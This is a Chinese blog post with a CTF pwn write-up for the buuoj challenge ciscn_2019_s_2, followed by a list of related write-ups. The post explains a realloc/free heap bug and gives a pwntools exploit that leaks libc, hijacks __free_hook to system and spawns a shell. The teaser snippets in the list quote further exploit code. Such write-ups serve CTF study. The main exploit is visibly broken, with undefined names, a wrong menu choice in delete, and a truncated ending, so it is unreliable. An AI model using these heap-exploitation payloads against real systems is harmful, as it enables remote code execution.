buuoj Pwn writeup 256-260

最新推荐文章于 2025-08-17 03:25:58 发布
原创 最新推荐文章于 2025-08-17 03:25:58 发布 · 386 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

博客内容涉及多个CTF挑战的解决方案,涵盖了堆管理漏洞利用、libc地址泄露、free_hook劫持等技术,包括对realloc、free、edit操作的利用,以及通过编辑字符串进行内存控制和got表劫持,最终实现远程命令执行。

256 ciscn_2019_s_2

在这里插入图片描述
add
在这里插入图片描述申请一个0x10的chunk,分别放着地址,大小,flag。

edit
在这里插入图片描述有个realloc,一会小心。

show
在这里插入图片描述
这个show就平平无奇。

delete
在这里插入图片描述
free没啥问题。但是他没有管我们刚刚说的结构体里面的flag。

这就导致什么,我们再free了chunk之后,ptr指针没了,但是我们可以edit传入空指针,走一次realloc。

空指针的realloc会发生什么,当我们的size是的时候,realloc会将他释放掉,清理指针的

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

elf = ELF("./256")

r = remote('node4.buuoj.cn',29001)
libc = ELF('./64/libc-2.27.so')

def add(size,content):
		r.sendlineafter('choice:',"1")
		r.sendlineafter('size?>',str(size))
		r.sendafter('content:',content)
def edit(idx,content):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))
		r.sendafter('content:',content)
def show(idx):
		r.sendlineafter('choice:',"3")
		r.sendlineafter('Index:',str(idx))
def delete(idx):
		r.sendlineafter('choice:',str(idx))
		r.sendlineafter('Index:',str(idx))
def edit2(idx):
		r.sendlineafter('choice:',"2")
		r.sendlineafter('Index:',str(idx))

add(0,'')
edit2(0)
delete(0)
add(0x10,p64(0))	#0
add(0x20,'aaa')		#1
show(0)
r.recvuntil('Content: ')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x2a0

add(0x500,'aaa')	#2
add(0,'')			#3
delete(2)
edit(0,p64(heap_base+0x2f0))	
show(1)
r.recvuntil('Content: ')
libc.address = u64(p.recv(6).ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
add(0x500,'/bin/sh\x00')	#2
fuck(3)
delete(3)
add(0x10,p64(libc.sym['__free_hook']))	#3
add(0x10,p64(libc.sym['system']))
delete
最低0.47元/天 解锁文章
二进制安全基础之pwn利器pwntools
kelxLZ的博客
06-24 1616
Author:ZERO-A-ONE Date:2021-06-24 一、深入理解pwntools的使用 1.1 pwntools常用模块 asm:汇编与反汇编 dynelf:远程符号泄露 elf:elf文件操作 gdb:启动gdb调试 shellcraft:shellcode的生成器 cyclic pattern:偏移字符计算 process/remote:读写接口 1.2 汇编与反汇编 将汇编指令转为机器码 >>> asm('nop') '\x90' 将机器码转为汇编指令 &g.
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 407
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
others_easyheap
doudoudedi
02-04 489
思路 堆溢出构造堆块重叠打free_hook为system exp: from pwn import * #p=process('./easyheap') elf=ELF('./easyheap') libc=elf.libc p=remote('node3.buuoj.cn',29973) def add(size,content): p.sendlineafter(':','1') p.s...
2017湖湘杯 pwn300
weixin_45966329的博客
02-28 214
2017湖湘杯 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcode执行即可 from pwn import * context(os='linux',arch='x86',log_level='debug') io=remote("node3.buuoj.cn",29028) #io=process("pwn300") elf=ELF('pwn300') def add
2017湖湘杯pwn300的wp
一个码农的笔记
12-03 1175
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.youkuaiyun.com/download/niexinming/10143408 把pwn300直接拖入ida中: main函数: add函数: 这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有
湖湘杯hxb_pwn
Trick的博客
11-08 250
湖湘杯hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 368
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 591
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 385
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
2017湖湘杯pwn100的wp
一个码农的笔记
11-30 2949
湖湘杯的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.youkuaiyun.com/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
CTFshow-pwn入门-pwn100 WP
最新发布
Claire_cat的学习记录
08-17 2189
在栈上的第二个位置,对于 printf 来说,rdi 是函数本身,第一个参数是 rsi,然后是 rdx、rcx、r8、r9,栈上第一个,栈上第二个的。原来正常返回的 main 函数某个地址和我们写入的后门地址都是在 elf 基址上计算的,高位相同。这里还在找后面地址在栈上的位置,所以这里的 1 是随便填的,hn 是写入两字节,对应地址后四位。的第一个参数,在调用 printf 时,寄存器会存 printf 的参数,会暂时把在。个,加上寄存器上的 5 个和栈上的第 0 个,是格式化字符串的第 17 个参数,
qwb2019_one(strchr的误用)
seaaseesa的博客
06-11 681
qwb2019_one(strchr的误用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,test功能里abs函数存在溢出,由此可以造成下标越界,进而可以泄露程序的地址。 在edit功能里,strchr可以返回字符串结尾的’\0’的位置,因此可以造成off bu one,我们每一次进行off by one将结尾的\0改掉,这样,我们就可以一步一步的逼近下一个chunk的size处,进而可以修改size 我们可以通过控制size,然后伪造chunk,进行unlink操作,然后
XDCTF PWN300&400 Writeup
这里没人
05-14 826
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1148
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
(BUUCTF)pwnable_bf
xy1458214551的博客
01-12 486
BUUCTF的pwnable_bf题解
攻防世界 - pwn100 - WriteUp
哒君的博客
06-11 4312
pwn100 文件链接 -> Github checksec 寻找漏洞 sub_40063D 函数中获取输入存放到 v1 ,存在栈溢出漏洞 攻击思路 该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc ,写入 /bin/sh 的操作 寄存器 rdi 中存放的是写入的地址,rsi 是写入的字节数,所以可以通过 po...
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值